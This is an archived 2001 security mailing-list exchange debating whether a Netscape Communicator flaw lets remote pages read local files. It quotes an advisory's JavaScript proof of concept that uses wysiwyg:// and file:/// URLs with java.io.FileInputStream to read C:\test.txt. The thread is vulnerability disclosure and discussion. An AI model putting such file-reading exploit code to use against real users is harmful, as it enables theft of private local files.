It's vastly different. Did you try creating c:\test.txt and putting something in it, and going to that page? Notice that it pops the first line in a dialog box. That means it has that info under programmatic contol, and can send it across the network back to the web server, exactly as claimed in the original advisory. Contrast that with (you) opening your c: drive with Communicator. You can browse local files, but only you get to see the contents, and that window isn't under any kind of programmatic control from other windows... at least that's how it's supposed to work. It's similar to the Java sandbox concept. Local and signed content are "trusted" and can do whatever they like, whereas remotely loaded content are "untrusted" and aren't supposed to be able to perform certain operations. When you (well, Netscape and Microsoft) try to mix the two, invariably mistakes will be made, and leaks will happen between the two. Ryan Hi - this appears to be no different then typing c:\ in the location of any browser hardly a security hole in my opinion the test site did not prove that this is a potential or current problem. Bill >Demonstration is available at: >http://www.geocities.com/ResearchTriangle/1711/b6.html > >The Javascript code is: > >sl=window.open("wysiwyg://1/file:///C|/"); >sl2=sl.window.open(); >sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your >file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new >java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) && >(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'"; >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:24:11 PDT